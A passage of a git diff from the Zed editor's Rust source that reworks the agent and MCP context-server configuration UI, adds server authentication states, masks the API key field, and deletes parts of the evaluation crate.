context_server_store = context_server_store.clone(); + let context_server_id = context_server_id.clone(); + move |_event, _window, cx| { + context_server_store.update(cx, |store, cx| { + store.logout_server(&context_server_id, cx).log_err(); }); } }), - ), - ), + ) + }) + .into_any_element(), ) - .map(|parent| { - if let Some(error) = error { - return parent.child( + } else if auth_required { + Some( + feedback_base_container() + .child( h_flex() - .gap_2() .pr_4() - .items_start() + .min_w_0() + .w_full() + .gap_2() .child( - h_flex() - .flex_none() - .h(window.line_height() / 1.6_f32) - .justify_center() - .child( - Icon::new(IconName::XCircle) - .size(IconSize::XSmall) - .color(Color::Error), - ), + Icon::new(IconName::Info) + .size(IconSize::XSmall) + .color(Color::Muted), ) .child( - div().w_full().child( - Label::new(error) - .buffer_font(cx) - .color(Color::Muted) - .size(LabelSize::Small), - ), + Label::new("Authenticate to connect this server") + .color(Color::Muted) + .size(LabelSize::Small), ), - ); - } - parent + ) + .child( + Button::new("error-logout-server", "Authenticate") + .style(ButtonStyle::Outlined) + .label_size(LabelSize::Small) + .on_click({ + let context_server_id = context_server_id.clone(); + move |_event, _window, cx| { + context_server_store.update(cx, |store, cx| { + store.authenticate_server(&context_server_id, cx).log_err(); + }); + } + }), + ) + .into_any_element(), + ) + } else if authenticating { + Some( + h_flex() + .mt_1() + .pr_4() + .min_w_0() + .w_full() + .gap_2() + .child(div().size_3().flex_shrink_0()) + .child( + Label::new("Authenticating…") + .color(Color::Muted) + .size(LabelSize::Small), + ) + .into_any_element(), + ) + } else { + None + }; + + let tool_label = if is_running { + Some(if tool_count == 1 { + SharedString::from("1 tool") + } else { + SharedString::from(format!("{} tools", tool_count)) }) + } else { + None + }; + + AiSettingItem::new(item_id, display_name, status, source) + 
.action(context_server_configuration_menu) + .action( + Switch::new("context-server-switch", is_running.into()).on_click({ + let context_server_manager = self.context_server_store.clone(); + let fs = self.fs.clone(); + + move |state, _window, cx| { + let is_enabled = match state { + ToggleState::Unselected | ToggleState::Indeterminate => { + context_server_manager.update(cx, |this, cx| { + this.stop_server(&context_server_id, cx).log_err(); + }); + false + } + ToggleState::Selected => { + context_server_manager.update(cx, |this, cx| { + if let Some(server) = this.get_server(&context_server_id) { + this.start_server(server, cx); + } + }); + true + } + }; + update_settings_file(fs.clone(), cx, { + let context_server_id = context_server_id.clone(); + + move |settings, _| { + settings + .project + .context_servers + .entry(context_server_id.0) + .or_insert_with(|| { + settings::ContextServerSettingsContent::Extension { + enabled: is_enabled, + remote: false, + settings: serde_json::json!({}), + } + }) + .set_enabled(is_enabled); + } + }); + } + }), + ) + .when_some(tool_label, |this, label| this.detail_label(label)) + .when_some(details, |this, details| this.details(details)) } fn render_agent_servers_section(&mut self, cx: &mut Context) -> impl IntoElement { let agent_server_store = self.agent_server_store.read(cx); - let user_defined_agents = agent_server_store + let agents = agent_server_store .external_agents() .cloned() .collect::>(); - let user_defined_agents: Vec<_> = user_defined_agents + let agents: Vec<_> = agents .into_iter() .map(|name| { let icon = if let Some(icon_path) = agent_server_store.agent_icon(&name) { @@ -962,10 +1008,11 @@ impl AgentConfiguration { .trigger( Button::new("add-agent", "Add Agent") .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) 
.label_size(LabelSize::Small), ) .menu({ @@ -1019,6 +1066,7 @@ impl AgentConfiguration { }); v_flex() + .min_w_0() .border_b_1() .border_color(cx.theme().colors().border) .child( @@ -1028,24 +1076,31 @@ impl AgentConfiguration { "All agents connected through the Agent Client Protocol.", add_agent_popover.into_any_element(), )) - .child(v_flex().p_4().pt_0().gap_2().map(|mut parent| { - let mut first = true; - for (name, icon, display_name, source) in user_defined_agents { - if !first { - parent = parent - .child(Divider::horizontal().color(DividerColor::BorderFaded)); - } - first = false; - parent = parent.child(self.render_agent_server( - icon, - name, - display_name, - source, - cx, - )); - } - parent - })), + .child( + v_flex() + .p_4() + .pt_0() + .gap_2() + .children(Itertools::intersperse_with( + agents + .into_iter() + .map(|(name, icon, display_name, source)| { + self.render_agent_server( + icon, + name, + display_name, + source, + cx, + ) + .into_any_element() + }), + || { + Divider::horizontal() + .color(DividerColor::BorderFaded) + .into_any_element() + }, + )), + ), ) } @@ -1069,27 +1124,46 @@ impl AgentConfiguration { .color(Color::Muted), }; - let source_badge = match source { - ExternalAgentSource::Extension => Some(( - SharedString::new(format!("agent-source-{}", id)), - SharedString::from(format!( - "The {} agent was installed from an extension.", - display_name - )), - IconName::ZedSrcExtension, - )), - ExternalAgentSource::Registry => Some(( - SharedString::new(format!("agent-source-{}", id)), - SharedString::from(format!( - "The {} agent was installed from the ACP registry.", - display_name - )), - IconName::AcpRegistry, - )), - ExternalAgentSource::Custom => None, + let source_kind = match source { + ExternalAgentSource::Extension => AiSettingItemSource::Extension, + ExternalAgentSource::Registry => AiSettingItemSource::Registry, + ExternalAgentSource::Custom => AiSettingItemSource::Custom, }; - let agent_server_name = 
ExternalAgentServerName(id.clone()); + let agent_server_name = AgentId(id.clone()); + let agent = Agent::Custom { + id: agent_server_name.clone(), + }; + + let connection_status = self + .agent_connection_store + .read(cx) + .connection_status(&agent, cx); + + let restart_button = matches!( + connection_status, + AgentConnectionStatus::Connected | AgentConnectionStatus::Connecting + ) + .then(|| { + IconButton::new( + SharedString::from(format!("restart-{}", id)), + IconName::RotateCw, + ) + .disabled(connection_status == AgentConnectionStatus::Connecting) + .icon_color(Color::Muted) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Restart Agent Connection")) + .on_click(cx.listener({ + let agent = agent.clone(); + move |this, _, _window, cx| { + let server: Rc = + Rc::new(agent_servers::CustomAgentServer::new(agent.id())); + this.agent_connection_store.update(cx, |store, cx| { + store.restart_connection(agent.clone(), server, cx); + }); + } + })) + }); let uninstall_button = match source { ExternalAgentSource::Extension => Some( @@ -1140,35 +1214,46 @@ impl AgentConfiguration { })), ) } - ExternalAgentSource::Custom => None, + ExternalAgentSource::Custom => { + let fs = self.fs.clone(); + Some( + IconButton::new( + SharedString::from(format!("uninstall-{}", id)), + IconName::Trash, + ) + .icon_color(Color::Muted) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Remove Custom Agent")) + .on_click(cx.listener(move |_, _, _window, cx| { + let agent_name = agent_server_name.clone(); + update_settings_file(fs.clone(), cx, move |settings, _| { + let Some(agent_servers) = settings.agent_servers.as_mut() else { + return; + }; + if let Some(entry) = agent_servers.get(agent_name.0.as_ref()) + && matches!( + entry, + settings::CustomAgentServerSettings::Custom { .. 
} + ) + { + agent_servers.remove(agent_name.0.as_ref()); + } + }); + })), + ) + } }; - h_flex() - .gap_1() - .justify_between() - .child( - h_flex() - .gap_1p5() - .child(icon) - .child(Label::new(display_name)) - .when_some(source_badge, |this, (tooltip_id, tooltip_message, icon)| { - this.child( - div() - .id(tooltip_id) - .flex_none() - .tooltip(Tooltip::text(tooltip_message)) - .child(Icon::new(icon).size(IconSize::Small).color(Color::Muted)), - ) - }) - .child( - Icon::new(IconName::Check) - .color(Color::Success) - .size(IconSize::Small), - ), - ) - .when_some(uninstall_button, |this, uninstall_button| { - this.child(uninstall_button) - }) + let status = match connection_status { + AgentConnectionStatus::Disconnected => AiSettingItemStatus::Stopped, + AgentConnectionStatus::Connecting => AiSettingItemStatus::Starting, + AgentConnectionStatus::Connected => AiSettingItemStatus::Running, + }; + + AiSettingItem::new(id, display_name, status, source_kind) + .icon(icon) + .when_some(restart_button, |this, button| this.action(button)) + .when_some(uninstall_button, |this, button| this.action(button)) } } @@ -1190,9 +1275,10 @@ impl Render for AgentConfiguration { .id("assistant-configuration-content") .track_scroll(&self.scroll_handle) .size_full() + .min_w_0() .overflow_y_scroll() .child(self.render_agent_servers_section(cx)) - .child(self.render_context_servers_section(window, cx)) + .child(self.render_context_servers_section(cx)) .child(self.render_provider_configuration_section(cx)), ) .vertical_scrollbar_for(&self.scroll_handle, window, cx), @@ -1306,38 +1392,45 @@ async fn open_new_agent_servers_entry_in_settings_editor( let settings = cx.global::(); let mut unique_server_name = None; - let edits = settings.edits_for_update(&text, |settings| { - let server_name: Option = (0..u8::MAX) - .map(|i| { - if i == 0 { - "your_agent".to_string() - } else { - format!("your_agent_{}", i) - } - }) - .find(|name| { - !settings - .agent_servers - .as_ref() - 
.is_some_and(|agent_servers| agent_servers.contains_key(name.as_str())) - }); - if let Some(server_name) = server_name { - unique_server_name = Some(SharedString::from(server_name.clone())); - settings.agent_servers.get_or_insert_default().insert( - server_name, - settings::CustomAgentServerSettings::Custom { - path: "path_to_executable".into(), - args: vec![], - env: HashMap::default(), - default_mode: None, - default_model: None, - favorite_models: vec![], - default_config_options: Default::default(), - favorite_config_option_values: Default::default(), - }, - ); - } - }); + let Some(edits) = settings + .edits_for_update(&text, |settings| { + let server_name: Option = (0..u8::MAX) + .map(|i| { + if i == 0 { + "your_agent".to_string() + } else { + format!("your_agent_{}", i) + } + }) + .find(|name| { + !settings + .agent_servers + .as_ref() + .is_some_and(|agent_servers| { + agent_servers.contains_key(name.as_str()) + }) + }); + if let Some(server_name) = server_name { + unique_server_name = Some(SharedString::from(server_name.clone())); + settings.agent_servers.get_or_insert_default().insert( + server_name, + settings::CustomAgentServerSettings::Custom { + path: "path_to_executable".into(), + args: vec![], + env: HashMap::default(), + default_mode: None, + default_model: None, + favorite_models: vec![], + default_config_options: Default::default(), + favorite_config_option_values: Default::default(), + }, + ); + } + }) + .log_err() + else { + return; + }; if edits.is_empty() { return; diff --git a/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs b/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs index a3a389ac0a068d92112ee98caacb2986c499ad86..e0df79ba4dfe226652818b120b7bfcc493c73b1e 100644 --- a/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs +++ b/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs @@ -68,14 +68,17 @@ impl AddLlmProviderInput { let provider_name = single_line_input("Provider 
Name", provider.name(), None, 1, window, cx); let api_url = single_line_input("API URL", provider.api_url(), None, 2, window, cx); - let api_key = single_line_input( - "API Key", - "000000000000000000000000000000000000000000000000", - None, - 3, - window, - cx, - ); + let api_key = cx.new(|cx| { + InputField::new( + window, + cx, + "000000000000000000000000000000000000000000000000", + ) + .label("API Key") + .tab_index(3) + .tab_stop(true) + .masked(true) + }); Self { provider_name, @@ -199,6 +202,7 @@ impl ModelInput { .text(cx) .parse::() .map_err(|_| SharedString::from("Max Tokens must be a number"))?, + reasoning_effort: None, capabilities: ModelCapabilities { tools: self.capabilities.supports_tools.selected(), images: self.capabilities.supports_images.selected(), @@ -340,10 +344,11 @@ impl AddLlmProviderModal { .child(Label::new("Models").size(LabelSize::Small)) .child( Button::new("add-model", "Add Model") - .icon(IconName::Plus) - .icon_position(IconPosition::Start) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .on_click(cx.listener(|this, _, window, cx| { this.input.add_model(window, cx); @@ -446,10 +451,11 @@ impl AddLlmProviderModal { .when(has_more_than_one_model, |this| { this.child( Button::new(("remove-model", ix), "Remove Model") - .icon(IconName::Trash) - .icon_position(IconPosition::Start) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Trash) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .style(ButtonStyle::Outlined) .full_width() @@ -808,9 +814,9 @@ mod tests { cx.update(|cx| { let store = SettingsStore::test(cx); cx.set_global(store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); - language_model::init_settings(cx); + language_model::init(cx); editor::init(cx); }); 
diff --git a/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs b/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs index 38805f2c26693f168c7273afddf5aceea44f83e3..9c44288e1cd23cd3bb0d6876f086c3f0e89dc4c7 100644 --- a/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs +++ b/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs @@ -1,26 +1,28 @@ -use std::sync::{Arc, Mutex}; - use anyhow::{Context as _, Result}; use collections::HashMap; use context_server::{ContextServerCommand, ContextServerId}; use editor::{Editor, EditorElement, EditorStyle}; + use gpui::{ AsyncWindowContext, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, ScrollHandle, - Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*, + Subscription, Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*, }; use language::{Language, LanguageRegistry}; use markdown::{Markdown, MarkdownElement, MarkdownStyle}; use notifications::status_toast::{StatusToast, ToastIcon}; +use parking_lot::Mutex; use project::{ context_server_store::{ - ContextServerStatus, ContextServerStore, registry::ContextServerDescriptorRegistry, + ContextServerStatus, ContextServerStore, ServerStatusChangedEvent, + registry::ContextServerDescriptorRegistry, }, project_settings::{ContextServerSettings, ProjectSettings}, worktree_store::WorktreeStore, }; use serde::Deserialize; use settings::{Settings as _, update_settings_file}; -use theme::ThemeSettings; +use std::sync::Arc; +use theme_settings::ThemeSettings; use ui::{ CommonAnimationExt, KeyBinding, Modal, ModalFooter, ModalHeader, Section, Tooltip, WithScrollbar, prelude::*, @@ -237,6 +239,8 @@ fn context_server_input(existing: Option<(ContextServerId, ContextServerCommand) format!( r#"{{ + /// Configure an MCP server that runs locally via stdin/stdout + /// /// The name of your MCP server "{name}": {{ /// The command which runs the MCP 
server @@ -280,6 +284,8 @@ fn context_server_http_input( format!( r#"{{ + /// Configure an MCP server that you connect to over HTTP + /// /// The name of your remote MCP server "{name}": {{ /// The URL of the remote MCP server @@ -342,6 +348,8 @@ fn resolve_context_server_extension( enum State { Idle, Waiting, + AuthRequired { server_id: ContextServerId }, + Authenticating { _server_id: ContextServerId }, Error(SharedString), } @@ -352,6 +360,7 @@ pub struct ConfigureContextServerModal { state: State, original_server_id: Option, scroll_handle: ScrollHandle, + _auth_subscription: Option, } impl ConfigureContextServerModal { @@ -475,6 +484,7 @@ impl ConfigureContextServerModal { cx, ), scroll_handle: ScrollHandle::new(), + _auth_subscription: None, }) }) }) @@ -486,6 +496,13 @@ impl ConfigureContextServerModal { } fn confirm(&mut self, _: &menu::Confirm, cx: &mut Context) { + if matches!( + self.state, + State::Waiting | State::AuthRequired { .. } | State::Authenticating { .. } + ) { + return; + } + self.state = State::Idle; let Some(workspace) = self.workspace.upgrade() else { return; @@ -515,14 +532,19 @@ impl ConfigureContextServerModal { async move |this, cx| { let result = wait_for_context_server_task.await; this.update(cx, |this, cx| match result { - Ok(_) => { + Ok(ContextServerStatus::Running) => { this.state = State::Idle; this.show_configured_context_server_toast(id, cx); cx.emit(DismissEvent); } + Ok(ContextServerStatus::AuthRequired) => { + this.state = State::AuthRequired { server_id: id }; + cx.notify(); + } Err(err) => { this.set_error(err, cx); } + Ok(_) => {} }) } }) @@ -558,6 +580,49 @@ impl ConfigureContextServerModal { cx.emit(DismissEvent); } + fn authenticate(&mut self, server_id: ContextServerId, cx: &mut Context) { + self.context_server_store.update(cx, |store, cx| { + store.authenticate_server(&server_id, cx).log_err(); + }); + + self.state = State::Authenticating { + _server_id: server_id.clone(), + }; + + self._auth_subscription = 
Some(cx.subscribe( + &self.context_server_store, + move |this, _, event: &ServerStatusChangedEvent, cx| { + if event.server_id != server_id { + return; + } + match &event.status { + ContextServerStatus::Running => { + this._auth_subscription = None; + this.state = State::Idle; + this.show_configured_context_server_toast(event.server_id.clone(), cx); + cx.emit(DismissEvent); + } + ContextServerStatus::AuthRequired => { + this._auth_subscription = None; + this.state = State::AuthRequired { + server_id: event.server_id.clone(), + }; + cx.notify(); + } + ContextServerStatus::Error(error) => { + this._auth_subscription = None; + this.set_error(error.clone(), cx); + } + ContextServerStatus::Authenticating + | ContextServerStatus::Starting + | ContextServerStatus::Stopped => {} + } + }, + )); + + cx.notify(); + } + fn show_configured_context_server_toast(&self, id: ContextServerId, cx: &mut App) { self.workspace .update(cx, { @@ -615,7 +680,8 @@ impl ConfigureContextServerModal { } fn render_modal_description(&self, window: &mut Window, cx: &mut Context) -> AnyElement { - const MODAL_DESCRIPTION: &str = "Visit the MCP server configuration docs to find all necessary arguments and environment variables."; + const MODAL_DESCRIPTION: &str = + "Check the server docs for required arguments and environment variables."; if let ConfigurationSource::Extension { installation_instructions: Some(installation_instructions), @@ -637,6 +703,67 @@ impl ConfigureContextServerModal { } } + fn render_tab_bar(&self, cx: &mut Context) -> Option { + let is_http = match &self.source { + ConfigurationSource::New { is_http, .. 
} => *is_http, + _ => return None, + }; + + let tab = |label: &'static str, active: bool| { + div() + .id(label) + .cursor_pointer() + .p_1() + .text_sm() + .border_b_1() + .when(active, |this| { + this.border_color(cx.theme().colors().border_focused) + }) + .when(!active, |this| { + this.border_color(gpui::transparent_black()) + .text_color(cx.theme().colors().text_muted) + .hover(|s| s.text_color(cx.theme().colors().text)) + }) + .child(label) + }; + + Some( + h_flex() + .pt_1() + .mb_2p5() + .gap_1() + .border_b_1() + .border_color(cx.theme().colors().border.opacity(0.5)) + .child( + tab("Local", !is_http).on_click(cx.listener(|this, _, window, cx| { + if let ConfigurationSource::New { editor, is_http } = &mut this.source { + if *is_http { + *is_http = false; + let new_text = context_server_input(None); + editor.update(cx, |editor, cx| { + editor.set_text(new_text, window, cx); + }); + } + } + })), + ) + .child( + tab("Remote", is_http).on_click(cx.listener(|this, _, window, cx| { + if let ConfigurationSource::New { editor, is_http } = &mut this.source { + if !*is_http { + *is_http = true; + let new_text = context_server_http_input(None); + editor.update(cx, |editor, cx| { + editor.set_text(new_text, window, cx); + }); + } + } + })), + ) + .into_any_element(), + ) + } + fn render_modal_content(&self, cx: &App) -> AnyElement { let editor = match &self.source { ConfigurationSource::New { editor, .. } => editor, @@ -682,7 +809,10 @@ impl ConfigureContextServerModal { fn render_modal_footer(&self, cx: &mut Context) -> ModalFooter { let focus_handle = self.focus_handle(cx); - let is_connecting = matches!(self.state, State::Waiting); + let is_busy = matches!( + self.state, + State::Waiting | State::AuthRequired { .. } | State::Authenticating { .. } + ); ModalFooter::new() .start_slot::
- - -
- -
-
-
- -
- Thread 1 of 1: - Default Thread -
- -
- - - - - - - - - - - - -
TurnTextToolResult
- - - - diff --git a/crates/eval/src/explorer.rs b/crates/eval/src/explorer.rs deleted file mode 100644 index 3326070cea4e860210f8ba7e0038fec2f3404c30..0000000000000000000000000000000000000000 --- a/crates/eval/src/explorer.rs +++ /dev/null @@ -1,182 +0,0 @@ -use anyhow::{Context as _, Result}; -use clap::Parser; -use serde_json::{Value, json}; -use std::fs; -use std::path::{Path, PathBuf}; - -#[derive(Parser, Debug)] -#[clap(about = "Generate HTML explorer from JSON thread files")] -struct Args { - /// Paths to JSON files or directories. If a directory is provided, - /// it will be searched for 'last.messages.json' files up to 2 levels deep. - #[clap(long, required = true, num_args = 1..)] - input: Vec, - - /// Path where the output HTML file will be written - #[clap(long)] - output: PathBuf, -} - -/// Recursively finds files with `target_filename` in `dir_path` up to `max_depth`. -#[allow(dead_code)] -fn find_target_files_recursive( - dir_path: &Path, - target_filename: &str, - current_depth: u8, - max_depth: u8, - found_files: &mut Vec, -) -> Result<()> { - if current_depth > max_depth { - return Ok(()); - } - - for entry_result in fs::read_dir(dir_path) - .with_context(|| format!("Failed to read directory: {}", dir_path.display()))? 
- { - let entry = entry_result.with_context(|| { - format!("Failed to read directory entry in: {}", dir_path.display()) - })?; - let path = entry.path(); - - if path.is_dir() { - find_target_files_recursive( - &path, - target_filename, - current_depth + 1, - max_depth, - found_files, - )?; - } else if path.is_file() - && let Some(filename_osstr) = path.file_name() - && let Some(filename_str) = filename_osstr.to_str() - && filename_str == target_filename - { - found_files.push(path); - } - } - Ok(()) -} - -pub fn generate_explorer_html(input_paths: &[PathBuf], output_path: &PathBuf) -> Result { - if let Some(parent) = output_path.parent() - && !parent.exists() - { - fs::create_dir_all(parent).context(format!( - "Failed to create output directory: {}", - parent.display() - ))?; - } - - let template_path = PathBuf::from(env!("CARGO_MANIFEST_DIR")).join("src/explorer.html"); - let template_content = fs::read_to_string(&template_path).context(format!( - "Template file not found or couldn't be read: {}", - template_path.display() - ))?; - - if input_paths.is_empty() { - println!( - "No input JSON files found to process. Explorer will be generated with template defaults or empty data." - ); - } - - let threads = input_paths - .iter() - .map(|input_path| { - let file_content = fs::read_to_string(input_path) - .context(format!("Failed to read file: {}", input_path.display()))?; - let mut thread_data: Value = file_content - .parse::() - .context(format!("Failed to parse JSON from file: {}", input_path.display()))?; - - if let Some(obj) = thread_data.as_object_mut() { - obj.insert("filename".to_string(), json!(input_path.display().to_string())); - } else { - eprintln!("Warning: JSON data in {} is not a root object. 
Wrapping it to include filename.", input_path.display()); - thread_data = json!({ - "original_data": thread_data, - "filename": input_path.display().to_string() - }); - } - Ok(thread_data) - }) - .collect::>>()?; - - let all_threads_data = json!({ "threads": threads }); - let html_content = inject_thread_data(template_content, all_threads_data)?; - fs::write(&output_path, &html_content) - .context(format!("Failed to write output: {}", output_path.display()))?; - - println!( - "Saved data from {} resolved file(s) ({} threads) to {}", - input_paths.len(), - threads.len(), - output_path.display() - ); - Ok(html_content) -} - -fn inject_thread_data(template: String, threads_data: Value) -> Result { - let injection_marker = "let threadsData = window.threadsData || { threads: [dummyThread] };"; - if !template.contains(injection_marker) { - anyhow::bail!( - "Could not find the thread injection point in the template. Expected: '{}'", - injection_marker - ); - } - - let threads_json_string = serde_json::to_string_pretty(&threads_data) - .context("Failed to serialize threads data to JSON")? - .replace("", r"<\/script>"); - - let script_injection = format!("let threadsData = {};", threads_json_string); - let final_html = template.replacen(injection_marker, &script_injection, 1); - - Ok(final_html) -} - -#[cfg(not(any(test, doctest)))] -#[allow(dead_code)] -fn main() -> Result<()> { - let args = Args::parse(); - - const DEFAULT_FILENAME: &str = "last.messages.json"; - const MAX_SEARCH_DEPTH: u8 = 2; - - let mut resolved_input_files: Vec = Vec::new(); - - for input_path_arg in &args.input { - if !input_path_arg.exists() { - eprintln!( - "Warning: Input path {} does not exist. 
Skipping.", - input_path_arg.display() - ); - continue; - } - - if input_path_arg.is_dir() { - find_target_files_recursive( - input_path_arg, - DEFAULT_FILENAME, - 0, // starting depth - MAX_SEARCH_DEPTH, - &mut resolved_input_files, - ) - .with_context(|| { - format!( - "Error searching for '{}' files in directory: {}", - DEFAULT_FILENAME, - input_path_arg.display() - ) - })?; - } else if input_path_arg.is_file() { - resolved_input_files.push(input_path_arg.clone()); - } - } - - resolved_input_files.sort_unstable(); - resolved_input_files.dedup(); - - println!("No input paths provided/found."); - - generate_explorer_html(&resolved_input_files, &args.output).map(|_| ()) -} diff --git a/crates/eval/src/ids.rs b/crates/eval/src/ids.rs deleted file mode 100644 index 7057344206ba1530db5034fc2ed5d73e52b41382..0000000000000000000000000000000000000000 --- a/crates/eval/src/ids.rs +++ /dev/null @@ -1,29 +0,0 @@ -use anyhow::{Context as _, Result}; -use std::fs; -use std::path::{Path, PathBuf}; -use uuid::Uuid; - -pub fn get_or_create_id(path: &Path) -> Result { - if let Ok(id) = fs::read_to_string(path) { - let trimmed = id.trim(); - if !trimmed.is_empty() { - return Ok(trimmed.to_string()); - } - } - let new_id = Uuid::new_v4().to_string(); - fs::create_dir_all(path.parent().context("invalid id path")?)?; - fs::write(path, &new_id)?; - Ok(new_id) -} - -pub fn eval_system_id_path() -> PathBuf { - dirs::data_local_dir() - .unwrap_or_else(|| PathBuf::from(".")) - .join("zed-eval-system-id") -} - -pub fn eval_installation_id_path() -> PathBuf { - dirs::data_local_dir() - .unwrap_or_else(|| PathBuf::from(".")) - .join("zed-eval-installation-id") -} diff --git a/crates/eval/src/instance.rs b/crates/eval/src/instance.rs deleted file mode 100644 index 54e6ab0b925191c16885b8b8ed89369039c467f6..0000000000000000000000000000000000000000 --- a/crates/eval/src/instance.rs +++ /dev/null @@ -1,1446 +0,0 @@ -use agent::ContextServerRegistry; -use agent_client_protocol as acp; -use 
anyhow::{Context as _, Result, anyhow, bail}; -use client::proto::LspWorkProgress; -use futures::channel::mpsc; -use futures::future::Shared; -use futures::{FutureExt as _, StreamExt as _, future}; -use gpui::{App, AppContext as _, AsyncApp, Entity, Task}; -use handlebars::Handlebars; -use language::{Buffer, DiagnosticSeverity, OffsetRangeExt as _}; -use language_model::{ - LanguageModel, LanguageModelCompletionEvent, LanguageModelRegistry, LanguageModelRequest, - LanguageModelRequestMessage, LanguageModelToolResultContent, MessageContent, Role, TokenUsage, -}; -use project::{DiagnosticSummary, Project, ProjectPath, lsp_store::OpenLspBufferHandle}; -use prompt_store::{ProjectContext, WorktreeContext}; -use rand::{distr, prelude::*}; -use serde::{Deserialize, Serialize}; -use std::{ - fmt::Write as _, - fs::{self, File}, - io::Write as _, - path::{Path, PathBuf}, - rc::Rc, - sync::{Arc, Mutex}, - time::Duration, -}; -use unindent::Unindent as _; -use util::{ResultExt as _, command::new_command, markdown::MarkdownCodeBlock}; - -use crate::{ - AgentAppState, ToolMetrics, - assertions::{AssertionsReport, RanAssertion, RanAssertionResult}, - example::{Example, ExampleContext, FailedAssertion, JudgeAssertion}, -}; - -pub const ZED_REPO_URL: &str = "https://github.com/zed-industries/zed.git"; - -#[derive(Clone)] -pub struct ExampleInstance { - pub thread: Rc, - pub name: String, - pub run_directory: PathBuf, - pub log_prefix: String, - /// The repetition number for this example (0-based) - /// When running multiple repetitions of the same example, each instance is assigned a unique repetition number. - /// This affects the worktree path and log prefix to avoid clobbering results between runs. 
- pub repetition: usize, - pub repo_path: PathBuf, - /// Path to the directory containing the requests and responses for the agentic loop - worktrees_dir: PathBuf, -} - -#[derive(Debug, Serialize, Clone)] -pub struct RunOutput { - pub repository_diff: String, - pub diagnostic_summary_before: DiagnosticSummary, - pub diagnostic_summary_after: DiagnosticSummary, - pub diagnostics_before: Option, - pub diagnostics_after: Option, - pub token_usage: TokenUsage, - pub tool_metrics: ToolMetrics, - pub thread_markdown: String, - pub programmatic_assertions: AssertionsReport, -} - -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct JudgeDiffInput { - pub repository_diff: String, - pub assertion: String, -} - -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct JudgeThreadInput { - pub messages: String, - pub assertion: String, -} - -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct JudgeOutput { - pub thread: AssertionsReport, - pub diff: AssertionsReport, -} - -impl ExampleInstance { - pub fn new( - thread: Rc, - repos_dir: &Path, - run_dir: &Path, - worktrees_dir: &Path, - repetition: usize, - ) -> Self { - let name = thread.meta().name; - let run_directory = run_dir.join(&name).join(repetition.to_string()); - - let repo_path = repo_path_for_url(repos_dir, &thread.meta().url); - - Self { - name, - thread, - log_prefix: String::new(), - run_directory, - repetition, - repo_path, - worktrees_dir: worktrees_dir.to_path_buf(), - } - } - - pub fn repo_url(&self) -> String { - self.thread.meta().url - } - - pub fn revision(&self) -> String { - self.thread.meta().revision - } - - pub fn worktree_name(&self) -> String { - format!("{}-{}", self.name, self.repetition) - } - - pub fn set_log_prefix_style(&mut self, color: &str, name_width: usize) { - self.log_prefix = format!( - "{}{: Result<()> { - let meta = self.thread.meta(); - - let revision_exists = run_git( - &self.repo_path, - &["rev-parse", &format!("{}^{{commit}}", &meta.revision)], - ) - .await - 
.is_ok(); - - if !revision_exists { - println!("{}Fetching revision {}", self.log_prefix, &meta.revision); - run_git( - &self.repo_path, - &["fetch", "--depth", "1", "origin", &meta.revision], - ) - .await?; - } - Ok(()) - } - - /// Set up the example by checking out the specified Git revision - pub async fn setup(&mut self) -> Result<()> { - let worktree_path = self.worktree_path(); - let meta = self.thread.meta(); - if worktree_path.is_dir() { - println!("{}Resetting existing worktree", self.log_prefix); - - // TODO: consider including "-x" to remove ignored files. The downside of this is that - // it will also remove build artifacts, and so prevent incremental reuse there. - run_git(&worktree_path, &["clean", "--force", "-d"]).await?; - run_git(&worktree_path, &["reset", "--hard", "HEAD"]).await?; - run_git(&worktree_path, &["checkout", &meta.revision]).await?; - } else { - println!("{}Creating worktree", self.log_prefix); - - let worktree_path_string = worktree_path.to_string_lossy().into_owned(); - - run_git( - &self.repo_path, - &[ - "worktree", - "add", - "-f", - &worktree_path_string, - &meta.revision, - ], - ) - .await?; - } - - if meta.url == ZED_REPO_URL { - std::fs::write(worktree_path.join(".rules"), std::fs::read(".rules")?)?; - } - - std::fs::create_dir_all(&self.run_directory)?; - - Ok(()) - } - - pub fn worktree_path(&self) -> PathBuf { - self.worktrees_dir - .join(self.worktree_name()) - .join(self.thread.meta().repo_name()) - } - - pub fn run(&self, app_state: Arc, cx: &mut App) -> Task> { - let project = Project::local( - app_state.client.clone(), - app_state.node_runtime.clone(), - app_state.user_store.clone(), - app_state.languages.clone(), - app_state.fs.clone(), - None, - project::LocalProjectFlags { - init_worktree_trust: false, - ..Default::default() - }, - cx, - ); - - let worktree = project.update(cx, |project, cx| { - project.create_worktree(self.worktree_path(), true, cx) - }); - - let meta = self.thread.meta(); - let this = 
